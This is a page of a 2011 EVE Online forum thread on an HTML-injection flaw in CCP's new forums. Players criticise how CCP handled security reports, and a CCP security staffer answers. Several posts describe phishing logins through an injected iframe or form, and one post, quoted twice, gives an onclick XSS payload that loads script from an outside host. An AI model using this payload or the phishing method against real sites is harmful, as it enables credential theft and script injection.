Pages: 1 2 3 4 [5] 6 7 8 9 10 :: one page |
|
Author |
Thread Statistics | Show CCP posts - 43 post(s) |
Smagd
Encina Technologies Namtz' aar K'in
|
Posted - 2011.04.12 08:57:00 -
[121]
Edited by: Smagd on 12/04/2011 08:59:35 Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).
I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:
T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.
At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually works.
In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.
Better than "Hey that subject line looks important".
|
Rixiu
The Inuits
|
Posted - 2011.04.12 08:58:00 -
[122]
I'll just leave this here
CCP, I am disappoint
|
Mynas Atoch
Eternity INC. Goonswarm Federation
|
Posted - 2011.04.12 09:05:00 -
[123]
Edited by: Mynas Atoch on 12/04/2011 09:05:52 I hadn't seen it all in one place before, but its really quite surprising that
a. CCP claim to have invested 72,000 man.hours...
b. to implement an off the shelf open source gplv2'd forum software YAF.net by adding an eve skin and their own account security, ...
c. but failed in its performance of the basic QA expected for any modern Web Application.
Here's a pdf The Open Web Application Security Project. You can print it out and read it at leisure.
|
Trebor Daehdoow
|
Posted - 2011.04.12 09:35:00 -
[124]
Originally by: Yuki Kulotsuki So mittens is king of the piggies?
Well, he is a bit of a ham.
Originally by: Gavjack Bunk Sreeg's Barrel. It's CCP's answer to Schrodinger's Cat. Do we know what state he's in right now?
Inebriation. He either collapses into it, or collapses because of it.
But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.
|
Gavjack Bunk
Gallente Genos Occidere HYDRA RELOADED
|
Posted - 2011.04.12 09:39:00 -
[125]
Originally by: Trebor Daehdoow But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues
A meltdown is defintely the best way to remind people that you're human.
|
Hel O'Ween
Men On A Mission
|
Posted - 2011.04.12 09:53:00 -
[126]
What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!
Only after another demonstration, they were put offline. How assuring is this for us?
Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious. -- EVEWalletAware - an offline wallet manager |
Hel O'Ween
Men On A Mission
|
Posted - 2011.04.12 09:55:00 -
[127]
Originally by: Misanth
Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even tho it could easily be made in a more appealing fashion. Etc.
Yeah, Hilmar's words at the FanFest keynote this year comes to mind: "We miscommunicated, we didn't communicate at all. We've learned from that." -- EVEWalletAware - an offline wallet manager |
Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
|
Posted - 2011.04.12 10:01:00 -
[128]
Edited by: Grimpak on 12/04/2011 10:01:01
Originally by: Hel O'Ween What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!
Only after another demonstration, they were put offline. How assuring is this for us?
Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken serious.
well to be fair, Sreegs is the security guy, not the code guy. that and the fact that it was a weekend also didn't help at all.
Originally by: Trebor Daehdoow But seriously now, while I thank Sreegs for his report, and his engagement with the community on this and other issues, the real challenge for CCP will be in what comes after the dust has settled -- "what happened" is important, but "why it happened" and "what steps must be taken to prevent it from happening again" are even more important, and it is the answers to those questions which will be the true basis for judgment.
tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all. ---
Quote: The more I know about humans, the more I love animals.
ain't that right. |
Super Whopper
I can Has Cheeseburger
|
Posted - 2011.04.12 10:09:00 -
[129]
Edited by: Super Whopper on 12/04/2011 10:09:53
Originally by: Trebor Daehdoow "what happened"
That thing called excellence, which CCP kept going on about, was exposed in all its glory. Now you may wonder why not a single blog has used that word in months.
Originally by: Hel O'Ween Yeah, Hilmar's words at the FanFest keynote this year comes to mind: "We miscommunicated, we didn't communicate at all. We've learned from that."
The only thing CCP have learned is how to use the CSM to string us along.
Originally by: Grimpak tbh from this side's POV this was yet another issue in a long string of issues that have plagued EVE lately where it seems that either QA didn't look at it or there is no QA at all.
Lately, since 2003.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 10:19:00 -
[130]
The DEV BLOG,
not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML. Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???
Sorry, but i do not think that account informations have not been at risk...
Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
|
|
Grimpak
Gallente The Whitehound Corporation Frontline Assembly Point
|
Posted - 2011.04.12 10:20:00 -
[131]
Originally by: Super Whopper Lately, since 2003.
I was actually talking about the rumoured contractual SNAFU that happened when Iceland went **** up that kicked out half of the QA department, but you can go that way too, saying this game is a failure from day 0. why are you playing tho? ---
Quote: The more I know about humans, the more I love animals.
ain't that right. |
Kepakh
|
Posted - 2011.04.12 11:04:00 -
[132]
Originally by: Kristina Vanszar
Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???
I am not particularly sure how you would be gathering any information just by adding a div and no script working...
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:06:00 -
[133]
Originally by: Kepakh
Originally by: Kristina Vanszar
Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???
I am not particularly sure how you would be gathering any information just by adding a div and no script working...
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
|
RaTTuS
BIG Gentlemen's Agreement
|
Posted - 2011.04.12 11:08:00 -
[134]
it was still limited to 500chracters
|
Kepakh
|
Posted - 2011.04.12 11:09:00 -
[135]
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data send anywhere...?
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:17:00 -
[136]
Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
|
Jimmae
|
Posted - 2011.04.12 11:19:00 -
[137]
Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data send anywhere...?
We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."
You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.
Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:25:00 -
[138]
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:23:55
Originally by: Kepakh
Originally by: Kristina Vanszar
A div with an iframe, which contains a fully functional login form, hosted from another website. Which is asking you to log in to the forums. there are plenty of users not thinking twice, who would just enter the credentials.
No script, no data send anywhere...?
We have a proverb where I come from: "If you don't have a clue just shut the f*ck up."
You don't need Javascript to trigger an HTTP Post Request. All you need is a <form> tag.
Besides that, not being able to inject a <script> tag doesn't mean I can not inject script through other ways. onclick for example can be an easy way, so can be a href.
This ^^ Thank you :-)
|
Miso Hawnee
|
Posted - 2011.04.12 11:26:00 -
[139]
If I performed like this at work, I would be fired and possibly in jail.
Maybe there is no IT equivalent to the NEC, maybe there are no standards or structure to it at all. I doubt this though, you don't go to college and learn Information Technology because its an inane science.
Oh hi ya we forgot to ground your 480v system, but we assure that it is working now. Never mind your line worker that is break dancing every time he touches a control desk. In fact, I recommend you fire that worker for bringing our incompetence to light.
|
Kepakh
|
Posted - 2011.04.12 11:45:00 -
[140]
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
|
|
Jimmae
|
Posted - 2011.04.12 11:52:00 -
[141]
Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 11:53:00 -
[142]
Edited by: Kristina Vanszar on 12/04/2011 11:56:15
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
WRONG! an iframe is nothing more then you opening another website, in this particular case, without knowing it.
@ Jimae, not 1000 % sure, but should work to, couse youre jumping over the check and are creating the script "in runtime"
|
|
CCP Sreegs
|
Posted - 2011.04.12 11:55:00 -
[143]
Originally by: Kristina Vanszar The DEV BLOG,
not at risk, sorry guys this must be joke, as you've said, it was possible to include HTML. Who would prevent me for adding a div, which looks exactly like your login one, make it be at the exatly same position as the original one, containing a iframe with the login form itself, and gather a some login informations???
Sorry, but i do not think that account informations have not been at risk...
Just as an sidetip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
Iframes were not possible. Only a limited subset of HTML was. The investigation is still ongoing but we have no reason to believe that spawning a shell or server compromise was possible either. |
|
|
CCP Sreegs
|
Posted - 2011.04.12 11:57:00 -
[144]
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
This code was not possible either. |
|
Kepakh
|
Posted - 2011.04.12 11:59:00 -
[145]
Originally by: Jimmae
1. I present you with an injected login form.
It is still the web server that determines if your injection will be passed or not and how the result will be displayed.
There is no evidence that handler as such would be working. You only state your speculations as facts.
|
Jimmae
|
Posted - 2011.04.12 12:01:00 -
[146]
Originally by: CCP Sreegs
Originally by: Jimmae Edited by: Jimmae on 12/04/2011 11:56:09
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onclick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">
Edit: Why do I always type onlick? Gotta be something Freudian.
This code was not possible either.
I am glad to hear that! It is one of the most basic examples and doesn't even try masking itself.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 12:01:00 -
[147]
K sreegs, thanks for the info, i changed all passwords i had, just in case.
can i ask you something: Please guys if you find out that something has gone terrible wrong, and **** could hit the fan verry badly.
let us know, se we can prepare ourself if that's the case, saying everything is fine and hoping noone will find out is just a bad idea.
If you are 1000000 % sure, nothing coul've happend, let us know too, but with a detailed description why....
Br, o7
BTW: i've filled out the BH form and haven't got any response till now.
|
|
CCP Sreegs
|
Posted - 2011.04.12 12:03:00 -
[148]
Originally by: mazzilliu apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.
perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.
I cannot comment on individual administrative actions as a matter of policy. This unfortunately also leaves me in a position where I cannot counter your speculation, except to point to the steps outlined in the blog and let you know that we really don't want to ban people from EVE. |
|
kakmonstret
|
Posted - 2011.04.12 12:03:00 -
[149]
Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">
Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be to sure.
Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.
Edit: And all nice theory was blow away by no frames allowed. Well well nice try.
|
Kristina Vanszar
Caldari
|
Posted - 2011.04.12 12:08:00 -
[150]
Originally by: kakmonstret
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar Standard HTML element, which is showing you ANOTHER website
See: iFrame
The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed. but it would look like it is on the forums.
Whatever you inject into a frame still needs to be processed at CCP web server and CCP Sreegs clearly said that no script will pass nor there is any evidence anyone has achieved that.
Did you even read what he wrote?
1. I present you with an injected login form. 2. You fill out said form. 3. It sends your credentials to me. 4. ??? 5. PROFIT
PS: Remember the proverb!
PPS: A very simple example on how to include a .js file from an external source using an onclick handler: <div onlick="(s=(d=document).createElement("script")).src='www.bit.ly/123';d.getElementsByTagName('body')">[0].appendChild(s)">
Okay people have you ever done stuff like this? Regarding the above example a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be to sure.
Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.
If the Frame element family was filtered by the Signature checks then it couldn't do any harm, i didn't wanted my accounts banned or even trouble with my RL copany going to hell because of an attack with CCP as target without a contract to do so, so i didn't tested it.
I hope Frames were not possible.
|
|
|
|
|
Pages: 1 2 3 4 [5] 6 7 8 9 10 :: one page |
First page | Previous page | Next page | Last page |